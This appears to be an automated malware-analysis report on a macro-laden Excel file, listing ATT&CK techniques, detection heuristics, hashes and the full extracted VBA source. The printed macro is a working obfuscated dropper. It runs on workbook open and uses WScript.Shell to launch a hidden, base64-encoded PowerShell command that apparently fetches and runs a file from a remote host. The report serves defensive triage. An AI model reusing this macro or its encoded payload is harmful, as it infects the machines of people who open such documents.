MALICIOUS
170
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The OOXML document contains VBA macros, specifically a Workbook_Open macro, which is a common technique for initial execution. The script utilizes WScript.Shell and CreateObject, indicating an attempt to execute arbitrary code. The obfuscated string concatenation suggests the download and execution of a secondary payload, likely via PowerShell, though the full URL or command could not be reconstructed due to truncation.
Heuristics 6
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
hiqiyekwag = "WSCript.shell" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set ptghvwtkb = CreateObject(hiqiyekwag) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub workbook_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 5626 bytes |
SHA-256: 3b80ee4932dcc30f5d90b143cdfe33dc58921587174441316abc3afca09f92c9 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 7 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
hdzo.vuv
fddgd = sdfs
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "hdzo"
Sub HelloWorld()
MsgBox "bv bvmn!", vbInformation + vbOKOnly, "l;j;j;ljguig"
End Sub
Sub vuv()
vls = oiup(189) & oiup(199) & oiup(190) & oiup(154) & oiup(169) & oiup(189) & oiup(154) & oiup(202) & oiup(233) & oiup(216) & oiup(241) & oiup(216) & oiup(223) & oiup(236) & oiup(237) & oiup(216) & oiup(194) & oiup(223) & oiup(216) & oiup(198) & oiup(198) & oiup(154) & oiup(167) & oiup(191) & oiup(154)
vls = vls & "WwBTAFkAUwB0AGUATQAuAHQARQB4AFQALgBlAE4AQwBvAEQASQBOAEcAXQA6ADoAdQBuAEkAQwBvAGQAZQAuAGcARQB0AFMAVABSAGkAbgBHACgAWwBzAHkAUwBUAGUATQAuAEMATwBuAHYAZQBSAFQAXQA6ADoARgByAG8ATQBCAGEAUwBlADYANABTAFQAUgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwBBAEcA"
vls = vls & "WQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEcAOABBAGQAZwBCADIAQQBHADAAQQBaAEEAQgByAEEARwBvAEEAWgBRAEEAZwBBAEMAZwBBAEkAQQBBAGsAQQBIAGsAQQBjAHcAQgB5AEEARwBRAEEAWgB3AEIANgBBAEcAdwBBAGQAdwBCAG0AQQBHAFEAQQBkAGcAQgBwAEEARwBnAEEAYQB3AEIAdwBBAEcAYwBBAEkAQQBBAHMAQQBDAEEAQQBKAEEAQgB4AEEARwBjAEEAWgBnAEIAMQBBAEgAQQBBAFkAdwBCAHkAQQBHAHcAQQBaAEEAQgAwAEEAQwBBAEEASwBRAEEATgBBAEEAbwBBAGUAdwBBAGcAQQBHAGsAQQBUAFEAQgBRAEEARwA4AEEAVQBnAEIAMABBAEMAMABBAGIAUQBCAFAAQQBHAFEAQQBkAFEAQgBzAEEARwBVAEEASQBBAEIAQwBBAEUAawBBAFYAQQBCAFQAQQBGAFEAQQBjAGcAQgBoAEEARwA0AEEAVQB3AEIARwBBAEcAVQBBAFUAZwBBADcAQQBBADAAQQBDAGcA"
vls = vls & "QgB6AEEARgBRAEEAUQBRAEIAeQBBAEYAUQBBAEwAUQBCAEMAQQBFAGsAQQBkAEEAQgBUAEEASABRAEEAVQBnAEIAQgBBAEcANABBAGMAdwBCAEcAQQBHAFUAQQBVAGcAQQBnAEEAQwAwAEEAVQB3AEIAdgBBAEgAVQBBAGMAZwBCAGoAQQBFAFUAQQBJAEEAQQBrAEEASABrAEEAYwB3AEIAeQBBAEcAUQBBAFoAdwBCADYAQQBHAHcAQQBkAHcAQgBtAEEARwBRAEEAZABnAEIAcABBAEcAZwBBAGEAdwBCAHcAQQBHAGMAQQBJAEEAQQB0AEEARQBRAEEAUgBRAEIAegBBAEgAUQBBAGEAUQBCAE8AQQBFAEUAQQBWAEEAQgBKAEEARQA4AEEAYgBnAEEAZwBBAEMAUQBBAGMAUQBCAG4AQQBHAFkAQQBkAFEAQgB3AEEARwBNAEEAYwBnAEIAcwBBAEcAUQBBAGQAQQBBADcAQQBDAEEAQQBKAGcAQQBnAEEAQwBRAEEAYwBRAEIAbgBBAEcAWQBBAGQAUQBCAHcAQQBHAE0AQQBjAGcAQgBzAEEARwBRAEEAZABBAEEANwBBAEMA"
vls = vls & "QQBBAGYAUQBCADAAQQBIAEkAQQBlAFEAQgA3AEEAQwBRAEEAWQB3AEIAawBBAEcAawBBAGEAUQBCADUAQQBHAE0AQQBhAEEAQgB4AEEARwBjAEEAYwBRAEIAdQBBAEgAawBBAGEAdwBCAHcAQQBHAFkAQQBkAHcAQgB1AEEARAAwAEEASgBBAEIARgBBAEcANABBAGQAZwBBADYAQQBGAFEAQQBaAFEAQgBOAEEASABBAEEASwB3AEEAbgBBAEYAdwBBAGQAQQBCAHQAQQBHAE0AQQBjAGcAQgBoAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgB2AEEASABZAEEAZABnAEIAdABBAEcAUQBBAGEAdwBCAHEAQQBHAFUAQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAE8AZwBBAHYAQQBDADgAQQBZAHcAQgBsAEEARwB3AEEAZQBnAEIAbABBAEcAUQBBAGIAdwBCAHUAQQBHAGsAQQBZAFEAQQB1AEEARwBNAEEAYgB3AEEAdgBBAEcAdwBBAFIAZwBCAHQAQQBEAGsAQQBTAHcA"
vls = vls & "QgB0AEEARgBNAEEAUQB3AEIAVgBBAEQAVQBBAFkAZwBCAEoAQQBFAGsAQQBSAGcAQgBKAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDAFEAQQBZAHcAQgBrAEEARwBrAEEAYQBRAEIANQBBAEcATQBBAGEAQQBCAHgAQQBHAGMAQQBjAFEAQgB1AEEASABrAEEAYQB3AEIAdwBBAEcAWQBBAGQAdwBCAHUAQQBEAHMAQQBEAFEAQQBLAEEARwA4AEEAZABnAEIAMgBBAEcAMABBAFoAQQBCAHIAQQBHAG8AQQBaAFEAQQBnAEEAQwBjAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBVAEEAYgBBAEIANgBBAEcAVQBBAFoAQQBCAHYAQQBHADQAQQBhAFEAQgBoAEEAQwA0AEEAWQB3AEIAdgBBAEMAOABBAGIAQQBCAEcAQQBHADAAQQBPAFEAQgBMAEEARwAwAEEAVQB3AEIARABBAEYAVQBBAE4AUQBCAGkAQQBFAGsAQQBTAFEAQgBHAEEARQBrAEEATABnAEIAbABBAEgA"
vls = vls & "ZwBBAFoAUQBBAG4AQQBDAEEAQQBKAEEAQgBqAEEARwBRAEEAYQBRAEIAcABBAEgAawBBAFkAdwBCAG8AQQBIAEUAQQBaAHcAQgB4AEEARwA0AEEAZQBRAEIAcgBBAEgAQQBBAFoAZwBCADMAQQBHADQAQQBPAHcAQQBOAEEAQQBvAEEAYgB3AEIAMgBBAEgAWQBBAGIAUQBCAGsAQQBHAHMAQQBhAGcAQgBsAEEAQwBBAEEASgB3AEIAbwBBAEgAUQBBAGQAQQBCAHcAQQBEAG8AQQBMAHcAQQB2AEEARwBNAEEAWgBRAEIAcwBBAEgAbwBBAFoAUQBCAGsAQQBHADgAQQBiAGcAQgBwAEEARwBFAEEATABnAEIAagBBAEcAOABBAEwAdwBCAHMAQQBFAFkAQQBiAFEAQQA1AEEARQBzAEEAYgBRAEIAVABBAEUATQBBAFYAUQBBADEAQQBHAEkAQQBTAFEAQgBKAEEARQBZAEEAUwBRAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQBrAEEARwBNAEEAWgBBAEIAcABBAEcAawBBAGUAUQBCAGoAQQBHAGcAQQBjAFEA"
vls = vls & "QgBuAEEASABFAEEAYgBnAEIANQBBAEcAcwBBAGMAQQBCAG0AQQBIAGMAQQBiAGcAQQA3AEEAQQAwAEEAQwBnAEIAOQBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEAIgApACkAfABpAEUAeAA="
On Error Resume Next
mmvrmskjgnmmoedwoujfghqignmdlzdbkktbvd = vls
tqapgctvxatakp (mmvrmskjgnmmoedwoujfghqignmdlzdbkktbvd)
End Sub
Function tqapgctvxatakp(iknrwroprqpsmrgy As String)
ahrzrxiqdlluofuxlmzmikrytjclwtkawi = 22 - 22
hgfh = "guhuioo ytuygy mbvmnbkiu"
hiqiyekwag = "WSCript.shell"
Set ptghvwtkb = CreateObject(hiqiyekwag)
yvjtvwngkfeoaqmpcqs = ptghvwtkb.Run(iknrwroprqpsmrgy, ahrzrxiqdlluofuxlmzmikrytjclwtkawi)
End Function
Function oiup(fdsg As Variant)
hfgdfh = "gffhgfg dfsafd fdssdge4"
oiup = Chr(fdsg - 122)
bvxcvd = "vxcn nmvm kuk et ,nbn hhfgd"
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 22528 bytes |
SHA-256: 9e4a5018d5932a4cbc29a8d7bcb6c926113f3bb45481cfbf8bfa67dde0dd412e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 7 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.